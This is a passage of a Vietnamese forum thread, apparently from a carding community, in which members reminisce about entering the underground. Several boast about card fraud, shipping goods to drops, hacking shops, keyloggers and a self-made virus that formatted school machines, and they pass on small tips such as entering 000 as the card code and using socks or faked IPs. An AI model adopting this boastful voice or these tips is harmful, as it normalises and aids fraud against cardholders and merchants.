+ Cho đến 1 ngày, vào freecodevn.com, thấy lão Rồng đang share host, add nick vào xin host. Rồi tháng 8 năm 2008, lão Spam all list huynhde.biz mở cửa. Cũng vào reg 1 acc (mem thứ 62). Vào nghịch nghịch 1 lúc, cũng biết được con CC nó như thế nào. Và cũng chính hôm đó, mình đã reg được domain lần đầu tiên tại Register (die sau đó 1 ngày). Lúc ấy cũng chưa biết cách làm sao để domain live lâu, nên cứ ip VN, add CC vào và phang >> còn đú đởn lập topic share domain  >> die all sau 1 ngày
……………….
Và đến tháng 8 này, mình đã trong 1 năm tham gia …
12.MOON
Mun thì Ham chơi
Chat chit vớ vẩn quen được Black Cat ^^! từ đó mình biết đến CC & Shell là j` và cách đọc CC nhưng ko có nguồn –> chán dần đều đi chơi Game
chán Game lại ngồi lướt Web
vào FCVN làm quen được thằng Andreay
thế rồi nó giới thiệu qua đây  –> bị nó dụ dỗ lúc nào mà ko hay
First UG của Mun đấy^^!
lọ mọ tìm hiểu thì cũng đã ra được mấy site & order thử = CC
kể cũng hay
Order phát nào ngon phát đấy – Domain hoặc Host hoặc VPS thì Live/Die 50 50
Còn lại thì em lựa chọn ” Gọi điện thoại cho người thân”
Trích:
UG chỉ muốn biết đến hack shop, local, config sever, vps…
đúng như Thallium nói
đến h vẫnko biết Hack Shop là j` & thế nào
còn Local thì vẫn mù mờ nói chung là gà
Config thì theo TUT mà chơi ^^! nhưng ít có thời gian thực hành
đến h đã 12 rồi đành bỏ UG 1 năm để kiếm cái ĐH đã rồi tính tiếp ^^!
13.mr.Tieo
Cũng như Moon..tức kyo…
Tieo cũng bắt đầu biết đến ug khi chơi dota trên cổng garena…Hồi đó chơi còn gà..thấy lâu lên kinh nghiệm quá vì chơi có 5-10 phút quit..Thế rồi cũng lên google…search “Hack garena”..
Lúc đầu thì nó ra vài cái…rồi cũng biết lần mò tìm thấy một số site bọn nó bảo dùng cc chùa để mua GG Shell ( đơn vị tiền tệ trong garena)..
Hồi đó nhớ có 1 anh ở VN mới bán GG shell = cách pay wa Vietcombank…Phù..mình thì nhà nghèo..Nhớ giá là 160k cho 10 GG Shell thì phải…Phù…
Thế rồi…lên 11 tức năm ngoái…Cũng vô tình vào trường tồn…thấy có thằng spam cái vietw0rm..hồi đó nó cũng mới bắt đầu thành lập nên cho reg nick tự do..
Bắt đầu từ đây..bắt đầu đọc các tut về sock,cc,ship tùm lum nhưng bên đó nó share cc kiểu cardchua ta ngày trước là thank mới thấy..vì thế hàng rất nhanh die..mãi 1 lần ntgkawa share 1 list rất dài..em check = tay ở wallet live 2 con …mệt đứt hơi..
Cầm 2 con ccv live trên tay..đi order cái myhosting.net..rồi cũng làm site leech rapid cho các bạn trong lớp…tụi nó nể lắm …. Đứa nào cũng dùng cái đó down film..Được 2 tuần thì die..
Khoảng hơn tháng sau…Check lại con 2 con cc thấy vẫn còn live 1 con..Đọc được 1 tut ship áo quần tự design bên Vietw0rm..em nhớ ko nhầm thì site đó là ZAZZLE.COM..Òa…lúc đó có quen ai đâu mà xin sock..vào VW thì sock die tùm lum..thế là cứ phang ZAZZLE = IP VN…Thế mà vẫn ped..Mà má nó éo có mail track nữa chứ…Nó về tận trường..tận lớp..cầm cái áo trên tay mà run lẩy bẩy…sợ quá..thế rồi cũng qua..Về mừng lắm..đây có lẽ là cái mà Tieo có thể cầm nắm đầu tiên…2 tuần sau..Bưu điện contact bảo có khiếu nại từ nước ngoài…sợ vkl ra…Thế rồi nó cũng lặng..ko có chuyện gì.
Bik đến cardchua từ hồi đang còn dùng doman : cardchua.cc . Cuối cùng cũng reg được nick..Kiếm từng cái thank 1 và cũng được như ngày hum nay
Đến giờ…Tieo ko muốn vỗ ngực bảo là pro nhưng cũng có thể hack đc shop nếu có site..tuy nhiên chả có key search nên cũng chán dần..chuyển qua ship…Ship thì cũng chả có gì là nhiều…1 cái đồng hồ 175$…1 cái hdd 89$…2 cái bluetooth …và tất cả đã nằm lại drop coi như quà..Tieo vẫn ko có gì..
Ở cardchua…Tieo quen được khá nhiều..Cyb..Kyo.v.v. và giờ là Cát bụi..Cảm ơn tất cả những ai đã giúp đỡ Tieo…À mà quên..Anh lep nữa nhỉ…Khi nào anh xuống chỗ em chơi em mời đi cafe …
14.LEP
toàn là vì host, domain nhỉ….. đến h vẫn vì nó ……
lúc đầu làm mod quản lý toàn trang bên vn-zoom.,…lang thang đọc bài ban, mem thì có 1 đứa gà con ( cấp hiệu) spam link.. để tuyển mem cho HKV….(thegioihacker)… nghe máu quá click vô và reg nick ….
Nhảy vô, oh. đúng thứ mình đang cần… acc rs với mu ( ngày nào cũng trốn 3 mẹ ra tiệm net down game, vì nhà lúc đó chưa lắp net)… hí hoáy đi xin acc, lúc đó có anh cornan share acc,,, và có rất nhiều người post pulic luôn….ban đầu chỉ lấy acc down game thôi
Sau 1 time, máu quá đi khoe bạn bè có acc….hú hú, mình thành nổi tiếng hehe…đứa nào cũng xin sài….ai dè có biết đâu nó block acc…huhu buồn…
Ngày hôm sau, quyết chí đi tầm sư học đạo, tiếng là thế chứ có đọc ra nổi con cc đâu…THấy anh …..( không nhớ nữa ) post cc… máu quá đọc xem nào, ồi loay quay mãi chả đọc ra, mà lúc đó cc get kiểu jif nhìn hoa cả mắt… đành gửi tin pri cho anh ấy xin dạy cách đọc cc…. sau 6 tin trao đổi thì biết cách đọc cc và hceck cc ở juno ( mừng hú tún, còn hỏi thêm 1 câu : ” sao em vô juno rồi mà không kiểm tra đc tài khoản của cc anh nhỉ
TIếp theo: CUối cùng thì cũng biết cách đọc cc rồi, đi mua thử con rs về khoe mấy thằng bạn….olala…Lúc đó dc anh cornan dạy điền 000 or 0000 vô để order….hehe thế là acc nó hiện ra…. mừng vãi… muợn ông chủ hàng net tờ giấy khi lại acc chạy về nahf khoe mấy thằng bạn ( quên trả tiền luôn )… đêm hôm đó mấy thằng kia ngồi đọc thuộc acc( nghĩ lại buồn cuời thật )
Cuộc sống đưa đẩy , HKV ngày càng ảm đạm ( hình như hôm nay 17/8, mạng cực kì cùi bắp, vô dc google là một vấn đề nan giải ….mình vẫn gắng check con mail…. thấy HKV open lại ) ……. tiếp nào đâu rồi nhỉ….à HKV ngày càng ảm đạm….rồi tự dưng quen dc thằng vuatansat7 nó mở 4rum hacker vietw0rm.net  hehe,, mình vô làm mod oai như cóc….dc vài tuần thì site đóng cửa, bảo trì jif đó….nghỉ luôn….
Một ngày đẹp trời, hình như là sắp sn mình…lúc đó có net rồi,,,,đang ngồi nghe nhạc và đi ban mem thì dứa nào nó spam… bảo cc mở cửa reg nick ( cardchua.cc)…OH. mừng quá nhảy vòa reg nick chơi….Ban đầu vô chơi, kím cc reg rs sell ( cùng đủ tiền mobile, khốn nổi lúc đó đã có phone đâu, đành sell rẻ cho mấy thằng bạn ….mình lấy tiền đó cho mẹ
Và một ngày một ngày nữa đã qua, bọn rs nó fix… thế là ….Tự dưng quen dc thằng huuthuan nó có giới thiệu bên vnc hay lắm…. mình hì hục ngồi check lại đống cc của mấy người đã post trc để qua bên kia post kím thank cho nó đủ post rq nick cho mình( lúc đó cc có cái check : live thì : amen không phải đói rồi )hihi…
15. Cát Bụi
3 năm trước mình có trúng tuyển vào bách khoa hà nội, ngành công nghệ thông tin. Lúc đó ông bà già vui lắm, Học trong đó gần 2 tháng đâu thấy cũng ổn ổn, vào 1 ngày đẹp trời đến lớp học sớm, và trong giờ học hôm ấy quay xuống mượn em bên dưới cái bút thì ăn viên phấn vào đầu, lúc đầu đéo biết thằng nào ném, hóa ra thằng thầy giáo, 1 lúc sau thì lại ăn viên nữa vào đâu, và 10 phút sau thì cổng trường mở để xe cứu thương vào và trở thằng thầy giáo đi, và hôm sau thì mình nhận được giấy đuổi học, lúc nhận giấy thì ko dám về nhà nữa, lang thang cả ngày hôm đó ko biết có lên về nhà ko, về nhà báo lại thì chắc ông bà già không chịu nổi. Thế là mình đi bụi từ đó luôn. Lang thang vào sài gòn làm phụ bàn để kiếm tiền để ăn và trả tiền phòng trọ, live ở đó hơn 1 năm, sau này thì mình về hà nội đi đánh giày kiếm sống, đi đánh giày đươc mấy tháng thì vào 1 ngày đó vào quán bia để xem ai đánh giầy ko, thì có 1 anh bảo đánh hộ anh đôi cái, đánh xong giầy thì anh ấy bảo mày đánh giầy thế này kiếm được nhiều ko ? cũng đủ ăn thôi anh ạ, anh đó bảo thôi mày tham gia vào chùa đi , chắc tháng cũng đủ tiền ăn và có khi thừa ra đó, lúc đó mình như đang chết đuối vớ được phao, vậy đồng ý luôn, cái anh bảo mình vào chùa đó là lão rongviet đó, vậy là từ đó vào cardchua lấy tên là Cát Bụi !
16.Wing
Còn mình thì sao nhỉ, hình như bắt đầu tham gia UG từ đầu năm 2008 thì phải,hồi đó mới tập tành làm web rồi thì HS nghèo ko chơi nổi domain and hosting nên đi xin host,đi xin host thì lại nghe dùng Cờ cờ gì đó reg,rồi mình tò mò vào google search thử,đầu tiên là vào ITVNN coi dc mấy topic về CC nhưng kho đó đã cấm post cc rồi, rồi site tiếp theo mình vào ITphutho thì phải, vô đó có bác admin của KVE quảng cáo site nên em cũng click vô reg nick thử,vào thì cũng chẳng biết làm gì ngoài việc post mấy cái nhảm nhỉ để view cc( vì lúc đó KVE actach file TXT mà 15 bài mới view dc),rồi bắt đầu đọc TUT reg domain ở reg, lần đầu tiên reg domain éo Fake Ip nên run lắm,……^^, rồi từ đó tới giờ cũng chỉ biết reg domain,….rồi thằng register nó Lock domain kinh quá, nên em cũng ko chơi domain nữa.
Rồi bắt đầu học hack shop,cũng ko nhớ lúc đó sao biết dc cardchua nữa,hình như có bác nào Spam em thì phải,rồi cũng tham gia CC,lần đầu tiên em get dc con Shop CCN bằng tool 3 table,mà 1 shop có 8k order mà tới 2 thằng ăn,bác ấy là th5tuananh,ngừoi share con shop này cho mình,vì lúc đó chưa biết search,……bỗng dưng 1 ngày con shop bị pullich=====>em đói lun ^^
Rồi em có wen dc 1 anh học cùng trường cũng từng tham gia UG và dc anh ấy cho cái tool search shop GURLE,chỉ về đọc hd rồi search thử,bước đầu cũng có nhiều shop nhưng chỉ toàn shop vị ăn hết rồi,em gà cũng chẳng ai chịu dạy mình cả,shop nào ko get dc bằng tool là em bỏ đấy, (em gét nhất là get shop lỗi Jet và áccess,).Rồi hack hít cũng chẳng dc shop ngon,em thấy nản vô cùng, 1 năm tham gia UG nhưng phần lớn em chỉ reg Domain and Hosting thôi chứ hack shop em kém lắm,……rồi em cũng ít online vì cũng bị là nhiều,nên lo học hành tí,rồi tham gia chém gió cùng anh em,xin này xin nọ,mà xin dc thì ít,mình xin họ im lặng thì nhiều
17.kiemtinhhp
em xin kể chuyện đời UG của em ko cần phải hư cấu vì nó đã lâm li bi đát lắm rồi .
cách đây 6 năm em bắt đầu biết đến UG do dạo đó học đc chút võ về keyloggger thế là nghiên cứu thêm một tí. trang đầu tiên em biết là thegioingam và bé yêu nhưng ko tham gia
hồi đó thằng bạn em nó bảo thằng học cùng cấp 2 với nó <lúc đó em đang học cáp 3 > ship dc di dộng với psp về việt nam hồi đó có site thetindung.biz đố. em cũng thèm làm nhìn nó cầm con psp mà thèm nhưng ko phải nó làm nên ko hỏi đc tự nhủ lòng mình “tao cũng làm keylogger cũng có tiền” << ngu quá hồi đó mà chiu khó học hỏi luôn có phải tiện ko
sau 3 năm cày keyloggger << phí thời gian quá, nghĩ lại thấy mình ngu
em quyết tâm dứt áo ra đi tìm về với sách vở. với mơ ước đỗ đc cái trường đại học cho vừa lòng ông bà già.càng học càng chán,bọn bạn thì cứ rủ đi chơi game thế là trượt đại học
em ngậm ngùi bước vào cổng trường cao đẳng VTC về tin học những mong đội ngũ giáo viên giàu kinh nghiệm, trang thiết bị đầy đủ nhưng học 1 năm với sự thất vọng vô cùng chán về cái trường em quyết tâm đi xin việc .
xin vào làm cho 1 công ty sửa máy tinh , làm thợ học việc ,làm đc 1 tháng thì thấy nó ko có tương lai em xin nghỉ luôn <nghèo lại hoàn nghèo> và em quay lại cộng đồng cũ của bé yêu, gặp lão mod bên đó bảo cardchua mới come back ,hồi đó là đầu tháng 9 năm 2008 < cardchua mới mở lại đc 1 tuần > với tất cả cồ gắng em cố gắng bám trụ ở đây qua mỗi đợt lão rồng việt dọa thank lọc anh em .những tháng đầu do trình độ gà + nghèo nên em khổ sở lắm.ko có tiền toàn phải đi vay tiền của vợ để tiêu + làm ug. mỗi lần thất bại là lại buồn, vợ nó lại an ủi, thế là lại đến nhà vợ ngủ và tập UG theo nghĩa khác <<UG=ủn giỏi>>
sau bao nhiu cố gắng và làm quen đc một số pro có tiếng tăm lẫy lừng như sao sáng trên bầu trời UG ,nhưng vì trình gà + ko có vốn + học mãi ko vào nên h em vẫn gà . chính vì gà nên h mới có thời gian ngồi chém gió với anh em thế này chứ
cũng như các bác ở đây .cardchua cũng là nơi em nghiên cứu về ug đầu tiên và cũng là nơi em cống hiến hết mình  phiêu bạt ở các site ug khác hết rồi nhưng nhớ mỗi anh em cc lên lại quay trở về
18. Kenrai
Hồi trước thích làm web nên mày mò mấy trang web free để tập tành, hết easyvn đến forumer rùi invision free, nhưng càng làm càng thấy nản vì công cụ quá ít để mà phát triển, lúc đó thì toàn đi xài domain free nên trong lòng rất muốn có 1 domain và host cho riêng mình. Vào google search thì thấy nói đến cái gì mà cc, hỏi mấy thằng bạn thì nó bảo xài cái đó khó lắm, lúc đó cũng chả bik kiếm cc ở đâu ra nên bỏ ý định.
Năm lớp 12 thì biết về vbb, tìm hiểu về nó thấy hay hay nên ghiền, lúc này có wen thằng bạn chỉ cho về host free nên cũng chỉ làm vbb trên host free. Vì nhu cầu làm vbb nên phải vào HQTH để học thêm, tình cờ vào topic giới thiệu các domain đẹp, thấy có domain cardchua.cc nên vào thử, thế là con đường UG của mình bắt đầu từ đây…
Vào dc. cardchua rùi thì còn bỡ ngỡ nhiều thứ lắm, mong ước lớn nhất lúc đó vẫn là phải làm sao reg dc. 1 cái domain, tình cờ đọc dc. topic về reg domain, thế là hăm hở tìm cc với sock để reg, mà lúc đó ko hiểu sao toàn sock die nên đâm liều lấy ipvn mà fang luôn. Trang reg domain mình biết là register.com, nhưng reg dc. 1 ngày thì nó die mất  Nói thật lúc reg dc. cái domain đầu tiên thì cảm thấy rất sung sướng, nhưng nó die nên quyết tâm reg lại cho bằng được, thế là tìm hiểu thêm và biết dc. nhiều trang nữa để reg, dần dần có kn hơn
Bây giờ thì có bik chút ít về ship, toàn ship quần áo là chính. Nói chung cc là ngôi nhà đầu tiên để mình bik đến UG, cám ơn các bạn trong cc đã giúp đỡ mình trong thời gian mình chập chững bước vào thế giới UG, tháng 9 này là đầy 1 năm mình bik UG và cũng là sn mình. Minh iêu tất cả anh em cc, chúc sức khỏe các bạn
19.kecodon
Đến bi giờ mình mới có khái niệm trong đầu là UG như thế nào ,
-Năm 2000 : bước chân vào lớp 10 ,nhìn thằng hàng xóm có quả máy tính pen III quả là VKL ,nó chơi cái trò gì mà bắn nhau tùm lum lên ,mịa ,sao thấy hình ảnh máy tính nó đẹp thế ,đẹp hơn cả cái tivi nhà mình ,lúc đó cảm tưởng như ai có PC là kinh khủng lắm ,nhìn ánh mắt tự đắc của nó mà mình thấy …khâm phục ,sờ sờ vào mouse của nó (nó cho sờ có một tẹo thôi) mình cảm thấy run run ,súng ống chổng ngược lên trời ,hix hix,
Mới đậu cấp 3 trường có tiếng ,bố mẹ chiều lắm lắm ,cho đi chơi cả ngày ,đi học về hem về nhà toàn đi chơi fifa 99 (được cái đá ngu không thể tả được,toàn thua)
Cuộc đời chó má nó cho mình biết internet vào cuối học kì 1 năm lớp 10 ,cả thành phố có 2 quán net ,thằng bạn nó rủ đi chat :”lắm gái lắm mày ơi” đkm ,máu quá! thế là đi chat (Chat MIRC) hem bik lập nick nhờ thằng chủ quán nó lập cho ,nó lập cho mất 20′ được cái nick dùng đến tận bi giờ,dkm mà giá chat là 4000vnd/h mới đắng chứ (mức giá năm 2000 ) ,sau vài ngày chat chit ,hẹn hò được vài em cùng thành phố đi ăn chè ,có cái casio fx 500 cắm được 30k mà tuần cắm 2 lần ,éo bik có phải mình xấu trai hay không mà éo con nào nó iu,đau tợn^^
éo iu được con nào ,quay về lớp thấy một em xinh xinh,gia nhập nhóm của em ấy để chơi hòng tiếp cận đối phương ,trong một số lần đi chơi thấy vài em trong nhóm có nhắc đến 2 chữ “diễn dàn” hoặc đại loại như”dạo này có hay post bài không” .Ôi Đkm cuộc đời ,mình éo hiểu “diễn đàn” nó là cái con vật gì ,hay là cái giống gì mới phát hiện ra,nghe mà mặt đần thối ra .(hồi đó đang còn nhỏ chỉ thỉnh thoảng mấy thằng hay rủ nhau xem sex ở nhà thằng nào bố mẹ vắng nhà là đã cảm thấy mình ..người lớn lắm rùi)
Nhưng vì yêu say đắm em ấy ,tình yêu thật kì diệu ,luôn khiến người ta ích kỉ .các em cứ nhắc đến anh này anh nọ ,mà éo nhắc tên ,toàn là nhắc bằng nick ,T_T ,mình không thể tưởng tượng được là có ông bố bà mẹ nào nỡ đặt tên con toàn là tên như trâu với bò ,rắn rết,cún với chả là chó ,Éo dám hỏi nhiều sợ nó chửi mình nhà quê.chỉ hỏi dò con bạn nó thì mới biết được đó là diễn đàn ttvnol.com ,đkm ,Máu chó của một thằng con trai mới nhớn nổi lên ,lọ mọ nhờ bạn nó lập cho cái acc ở forum ttvnol ,thì thấy nó đang acc của em nó post bài đều như vắt chanh trên đó,thế là mình cố gắng tán chuyện ,và cố gắng post bài thật hay (bây giờ đọc lại thấy mình post ngu vkl).Ấy thế mà éo ai thèm để ý đến mình (kecodon vẫn mãi là kẻ cô đơn) hu hu
Cảm giác thất vọng tràn trề !!!
Càng ngày càng cảm thấy mình bất tài vô dụng ,không thể so sánh với bạn bè của em nó được ,
Trong cơn điên của tình yêu ,không có ý niệm nào khác ngoài nghĩ về người yêu và tất cả những thứ liên quan đến tình yêu cả ,biết em thỉnh thoảng hay chat ,Dù mình đói như con sói ,nhưng cứ có tiền là mình online để chờ trên mạng biết đâu có một ngày gặp em để nói vài câu có cánh ,lang thang quán net trong vô vọng ,Chợt một hôm có thằng bên cạnh nó bật một website mình nhớ như in (lần đầu tiên được bik thế nào là một site đẹp) đó là trang http://thaonguyentinhyeu.com ,thằng bé choáng ngợp thực sự ,nó có hình ảnh fantasy ngay trang chủ,hic hic ,đẹp không tưởng tượng được mở tiếp trong gallery ra thấy một đóng ảnh fatasy nữa ,oài ,thế là copy paste ngay vào hòm thư ,gửi linh tinh cho bạn bè ,(có hòm thư và biết sử dụng hòm thư là model của teen lúc ấy nên cứ lên mạng là check mail và reply và …éo bik làm gì khác)
Đặc biệt là có phần dạy hack ,vãi lồn con chồn ,mình vào đọc chả hiểu cái gì cả ,nhưng lại chú ý đặc biệt đến phần ăn trộm pass yahoo ,đọc vẫn éo hiểu cái gì và làm như thế nào ,ặc ặc ,chỉ nhớ đại loại là lừa cho victim (mà cũng éo hiểu victim là cái éo gì ,về kể lại cho thằng bạn thân nghe toàn đọc ra là vịt tím ,ặc ặc) mở mail ra sẽ bị mất pass ,mình làm y như hướng dẫn mà vẫn éo làm được ,Nhưng trong đầu vẫn có ý nghĩ đen tối là ăn trộm yahoo của em yêu để biết xem thằng nào tán em ,*0* ,
Cái ý nghĩ mất dạy ấy vẫn cứ luẩn quẩn trong đầu một kẻ đang yêu ,rồi lên mạng ,vừa ngắm site đẹp ,vừa đọc đi đọc lại TUT cả tuần cũng éo hiểu ,càng đọc càng thấy sao các anh đúng là superman ,không biết bao nhiều lần ước mơ ,và tự đặt câu hỏi họ đã làm như thế nào
Từ victim biến thành scamer : Vào buổi chiều mình nhớ là éo đẹp trời ,nắng VKL ,đang chat YIM thì có một thằng có cái nick cả đời éo bao giờ quên là chuotbac nhảy vào chat với mình ,nó bảo rằng “bạn đã bị hack pass” nó đọc luôn password của mình ra mới kinh chứ ,éo con mẹ vừa cay vừa sợ ,phải chăng là mình đã gặp một trong số những superman từ lâu mình ngưỡng mộ,
thế là mình tuyên bố một câu xanh rờn ,nghĩ lại vẫn thấy mình chém gió ác “ông lấy nick thì cho ông luôn đấy ,sau đó tôi sẽ lấy lại ,và lấy luôn nick của ông,Tôi là một hacker ” dkm chuối cả nãi ,thế mà nó lại tưởng thật ,nó ngồi nài nỉ đến hơn một tiếng đồng hồ để mình dạy cho nó ,ặc ặc ,tất nhiên là từ chối khéo đi kèm với đôi lời khuyên bảo roài ,hix,thế là vụ scamer đầu tiên thành công ,hix hix
-Sau vụ đấy thì cường độ online cũng giảm dần ,với một tình yêu lặng câm ,éo dám nói ,chỉ biết nhìn từ xa với đôi mắt đắm đuối .
Cho đến khi nghỉ hè chuẩn bị lên lớp 11 ,được bố mẹ cho phép ra hà nội ở chơi 1-2 tháng với anh trai đang học đại học ngoài hà nội ,Ra HN với bao nhiêu hào hứng ,vì ông anh trai có cái máy tính 586 ( máy tính trước thế hệ Pen) và còn bao điều thú vị đang chờ đợi tâm hồn trẻ thơ ,ra hà nội cũng là lần đầu tiên được vào quán hát karaoke ,do ông anh trúng lô bằng tiền của mình ,
Rồi tiền cũng nướng vào lô sạch sẽ ,mình ở với ông anh trai và 2 người bạn của anh ,đói như sói,còn mỗi gạo ,éo có thức ăn ,mua chịu mì tôm quán gần nhà được một hai hôm nó éo cho nợ nữa ,hem còn cách nào khác ,mấy ông anh nấu cơm và lôi …hộp muối ra
Các anh đi học ,để thằng em ở nhà với cái máy tính ,hem có việc gì làm lôi một vài quyển sách của anh ra xem,trong đó có một cuốn ,ngôn ngữ lập trình pascal ,màu xanh da trời của trường Đại Học Thủy Lợi,thấy nó có nhiều câu lệnh loằng ngoằng hơi giống giống như thaonguyentinhyeu ,thế là ngồi buồn học pascal ,thỉnh thoảng có anh N học k40 CNTT bách khoa sang chơi cũng biết pascal ,anh ấy đang làm phần mềm tìm đường hà nội viết bằng pascal ,thế là tiện thể học luôn .Nhung chỉ độ nửa tháng sau ,sự cố ập tới ,Các anh đi đánh bài xuyên đêm ,để lại thằng em một mình ở nhà với nồi cơm nấu từ hôm trước ,hết gạo ,hết thức ăn,ko có tiền ,thằng em đi đá bóng ở sân Y về gặp mưa lên cơn sốt .tụt huyêt áp ,nằm lã người đến 1h đêm ,nhớ lời mẹ dặn là khi nào cảm thấy lã người tụt huyết áp thì ăn đồ nóng vào ,DKM ,trớ trêu ,là mở nồi cơm ra,nó chắc thiu từ thời nhà Tống ,nhưng không còn cách nào khác .Cắm lại cơm ,Cắm xong,ăn ngay lúc còn nóng ,mùi nó cũng không nặng lắm ,đớp được 2 bát thì ngủ lúc nào không bik,Sáng mai ngủ dậy ,việc đầu tiên là nhẩy vào nhà vệ sinh,ngồi khoảng 4 tiếng sau các anh mới về ,thấy thằng em thân tàn ma dại ,anh nhiều tuổi nhất thương quá ,góp ý một câu”thôi em đừng dùng giấy vệ sinh làm gì ,cứ mặc quần vào ,rồi lại chạy ra luôn cho nhanh…chùi nhiều rát đít lắm ,ặc ặc..
Anh trai đi mua thuốc hạ sốt và thuốc đau bụng về ,thuốc đau bụng là CM ,không để ý là mình có truyền thống dị ứng thuốc ,ông anh bảo “bây giờ em đau bụng nặng quá rồi ,người ta uống khoảng 1-2 viên ,em uống 3 viên cho nhanh khỏi ,uống bù cho tối qua luôn” ,Hix hix,thế là uống ,chiều hôm đó bị dị ứng thuốc mặt mình mọc nhiều nốt có nước giống thủy đậu ,nhưng nhỏ hơn mà tùng đám mật độ dày như kiến ,đến sáng hôm sau thì toàn bộ chúng nó nổ ,mặt mình cảm tưởng như vừa bị tai nạn xe ,…kinh lắm ,sau đó một hôm mẹ đưa mình về đi nhập viện
Trong khoảng thời gian ở Hn thấy anh trai hay quét virus bằng BKAV ,mình chỉ biết là trong máy tính anh có virus ,nó giống như cúm ,chứ chưa biết nó là gì ,mình thấy nó quét hay hay,hỏi anh ,anh chỉ bảo là virus là một chương trình
Với chiến tích đau thương mang từ Trung Ương về ,mình lại tiếp tục vào thaonguyentinhyeu để xem ,và mình biết một loại keylog là sub7 chúng nó hay sử dụng ,nhưng mình éo bik sử dụng ,hix hix
vào năm đó virus ILOVEOU đang phát tán với sức phá hủy cực kì khủng khiếp ,nó làm kich thích vào đầu óc vỗn đã không còn sạch sẽ của mình ,với mục đích cao cả là sẽ cho máy của nhà em ,và toàn bộ máy tính thí nghiệm của trường sẽ xuất hiện câu “Chúc mừng SN em yêu”và bắt đầu tim hiểu về virus và cơ chế của virus ,
Vào cái thời buổi tin học là một thứ xa xỉ ấy ,tìm được cái thứ để mà học về lập trình thì cực kì khó,mà éo ai dạy cho ,mình chỉ biết được rằng “virus là một ngôn ngữ lập trình” thế là hí hửng dùng pascal ,
1 tuần có một buổi thí nghiệm tin học thế là cứ thế thử viết rồi coppy vào đĩa mềm ,vác lên trường thử,lần éo nào cũng xịt ,có lần cắm đĩa mềm vào còn bị thầy chửi cho te tua ,nhưng rồi kết quả cũng không phụ sự cố gắng ,trên cái màn hình 486 đen kịt ở trường cũng xuất hiện dòng chữ mà mình thích ,sau đó là lệnh format ổ (éo bik thêm vào lúc nào) xong cái ,rút nguồn điẹn ra cắm lại ,báo với ông thầy là máy éo lên ,đổi máy ,lạy chúa ông ấy éo để ý ,Nhưng thất bại là vẫn chưa bít chúng nó lây lan như thế nào ,và con virus của mình éo ẩn iếc gì cả ,cứ chình ình ra, thế là lại tốn tiền tốn time để tìm hiểu virus ,rồi viết bằng ASM ,rồi cũng viết ra được một chú thô sơ ,có khả năng lây qua đĩa mềm được ,và rồi cũng chẳng để làm gì,vì qua mẹ nó SN người yêu lâu roài ,mà éo bik làm thế nào để cho con virus nó được nằm trong máy nhà nó…đến nhà nó mình con éo bik ,nhát gái vkl .Được mỗi cái là hết cảm giác sợ thằng hàng xóm vì nó vẫn hay khoe rằng ,cả thành phố có đúng 2 thằng hacker ,đều là bạn nó ,
-Học Cracker :lần này thì thực sự khó ,vì chỉ biết được cái từ Cracker qua tạp chí PC word mựon của thằng hàng xóm (được cái nó lắm tiền ,nên mua lắm sách báo) lần này thì cảm hứng lại tuôn trào ,trong dòng máu không sạch sẽ ,với một tình yêu thầm lặng bất diệt ,cùng với sự bất mãn với mấy anh đẹp zai trên ttvnol ,tất cả những cái ấy nằm trong đầu một thằng tỉ phú thời gian,nhưng éo ai dạy ,may mà trong quá trình học làm virus mình đã biết về ASM nên đọc bài viết của anh gì ở trong TPHCM ấy ,cũng không mất quá lâu để trở thành Cracker hạng ruồi ,cũng bởi phần mềm thời đấy cũng thô sơ .Chỉ nhớ đúng một câu “không có phần mềm nào không bẻ khóa được vấn đề là thơi gian”
-Tất cả những thứ ấy ,chỉ giết thời gian chứ không thể mang lại chút hy vọng cho tinh yêu đau khổ này được ,Thế là sau vài ngày không bít làm gì ,nảy ra ý định có một thứ thật đẹp ,thật bất ngờ để tặng em ,Cái đập ngay vào mắt là TNTY ,mình phải tìm cách làm như họ ,1 tuần ,rồi 2 tuần ,3 tuần ,vẫn chưa thể nghĩ ra sao họ lại làm được ,4 tuần ,5 tuần ,rồi cũng lóe lên trong đàu óc ngu dốt này một cách thô thiển ,mà ngày sau ai bik chắc là cười mình xấu hổ chết mất ,mình chỉ đọc trên mạng thấy làm site miễn phí ,quá sướng ,nhưng mịa ,xấu kinh lên được,rồi mình lần mò vào các trang cung cấp free web của nước ngoài ,trang đàu tiên là trang này http://freewebs.com ,mịa từ đầu là sử dụng sẵn site mẫu của nó ,cũng còn đẹp chán ,nhưng tham vọng của thằng em lúc đó là TNTY kia ,thế là xem xet ,thì thấy nó cho viết bàng HTML , (thực ra bik éo gì HTML là như thế nào ) nhưng mình tìm tất cả các thứ có dòng chữ HTML mà minhg bit ,và vô tình nháy chuột phải vào site TNTY và hồi đó còn manhhai.tk rồi view source thì nó ra hàng lô hàng lốc html ,coppy paste vào freewebs thì thấy hiện ra một đóng chữ và màu ,mình biết là mình tìm ra thứ mình cần (sau này mới thấy ngây thơ dến tội nghiêp)
thế là mất mấy ngày để coppy paste ,ghi chép,rồi táng cả đống javascript vào ,nặng kinh,nhưng éo bit vì sao nó nặng , rồi cũng có được sản phẩm đẹp ,
-KHI TÌNH YÊU ĐẾN: sau khi có sản phẩm mình gọi ngay cho con bạn thân của nó (cũng là ngươi giúp mình cua ngươi mình yêu) đến để duyệt trước khi đến tay chủ nhân,ôi ,dkm ,nó phải hét lên vì bất ngờ ,và còn nhìn mình đắm đuối con cá chuối nữa chứ ,nó thật sự xúc động ,và trong cơn cao húng ấy ,mình quyết định làm cho nó hoàn thiện hơn trong vòng vài ngày tới ,cho ăn chắc,trong mấy ngày ấy mình nhận được sự quan tâm nhiệt tình của cô bạn thân người mình yêu ,mình cảm giác như người mình yêu đã được nghe phong thanh gì đó rồi ,và mừng thầm chờ ngày gặt hái.
2 hôm sau thì gặp bạn bè thì thấy bạn bè hay trêu ghẹo mình và người bạn thân của người mình yêu,và cô bé ấy cũng đáp lại băng thái đọ đồng thuận ,DKM,có chuyện gì đã xảy ra chăng?tự hỏi.về nhà tiếp tục làm site(lỡm) sau khi hoàn tất thủ tục,duyệt lại lần cuối ,thì dkm ,nhìn lại tất cả đều ổn ,chỉ trừ có cái câu “Gửi L ,người con gái tôi yêu” là có vấn đề ,mịa tên em mình yêu có chữ cái đầu tiên giống chữ cái đầu tiên trong tên của bạn thân cô ấy ,Hix ,bây giờ thì mình đã hiểu
-Lần đầu bị Scam hụt :
